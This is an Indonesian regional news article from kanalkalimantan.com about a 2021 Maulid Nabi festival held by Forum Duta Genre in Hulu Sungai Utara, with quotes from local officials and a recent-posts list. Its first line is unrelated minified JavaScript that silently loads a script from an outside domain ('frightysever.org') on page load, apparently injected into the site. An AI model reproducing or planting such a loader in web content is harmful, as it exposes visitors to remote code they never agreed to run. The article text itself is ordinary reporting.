(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Meriahkan Bulan Maulid Nabi, Forum Duta Genre HSU Gelar Festival Maulid


KANALKALIMANTAN. COM, AMUNTAI – Guna memeriahkan Maulid Nabi Besar Muhammad SAW, Forum Duta Genre Kabupaten Hulu Sungai Utara (HSU) menggelar Kegiatan Festival Maulid Tahun 2021 dengan mengadakan berbagai lomba.

Kegiatan yang dihelat di GOR Pangeran Suryanata Amuntai dari tanggal 23- 24 Oktober 2021, memperlombakan berbagai kegiatan seperti, Lomba Maulid Habsyi, Lomba Nasyid Islami, dan Lomba Fashion Show Busana Muslim.

Kepala DPPKB HSU Hj Anisah Rasyidah Wahid saat membuka kegiatan mengatakan, peringatan Maulid Nabi Besar Muhammad SAW merupakan momentum untuk menambah bekal ilmu, takwa, serta meningkatkan derajat kecintaan kepada Nabi Muhammad SAW.

“Kita semua berharap dalam kesempatan ini dapat mengikuti rangkaian kegiatan peringatan Maulid Nabi Besar Muhammad SAW dengan khusyuk agar setiap nafas yang kita hirup dan kita hembuskan mengalirkan keberkahan,” kata Anisah Wahid, Sabtu (23/10/2021) malam.

 

Baca juga : Tak Bisa Pulkam ke Papua Rayakan Natal, Panggung Seni Mahasiswa Galang Dana di Banjarbaru

Anisah juga mengajak anak – anak dan remaja bersama-sama meramaikan mesjid dan shalat di mesjid agar bisa menjadi generasi penerus bangsa yang berakhlakul karimah.

“Melalu acara Festival Maulid 2021 ini dilaksanakan guna mencari sosok remaja yang mampu menjadi role model bagi remaja sebaya dalam hal penerapan norma – norma agama,” imbuhnya.

Sementara Ketua DPD KNPI Kabupaten HSU Almien Ashar Safari mengatakan kegiatan ini diharapkan dapat berlanjut di tahun-tahun akan datang.

“Saya merasa sangat bangga dan berterima kasih kepada peserta yang telah datang pada kegiatan yang sangat mulia ini dalam berlomba-lomba mengagungkan Nabi Besar Muhammad SAW. Semoga kita mendapatkan berkah, dan mendapatkan ridho dari Allah SWT,” imbuhnya.

 

Baca juga : Gegara Semprotan Aromaterapi yang Mengandung Bakteri, 4 Orang Terkena Melioidosis

Dalam laporannya, Panitia Pelaksana Muhammad Ramadhan menjelaskan, Festival Maulid tahun 2021 ini diikuti 15 Group Habsyi, peserta Nasyid 6 orang dan 8 orang Fashion Show.

Ia berterima kasih banyak kepada Pemkab HSU dan Disporapar HSU karena telah menyediakan tempat sehingga dapat melaksanakan acara festival maulid tahun 2021.

“Juga pihak sponsor yang telah mendukung dapat terlaksananya kegiatan ini.”
Dalam kegiatan tersebut tampak hadir Kepala DPPKB HSU, Ketua KNPI HSU, Kabid KSPK DPPKB HSU, Perwakilan Dandim 1001/Amt/Blg. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

13 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

14 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

14 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

16 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

17 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

18 jam ago

This website uses cookies.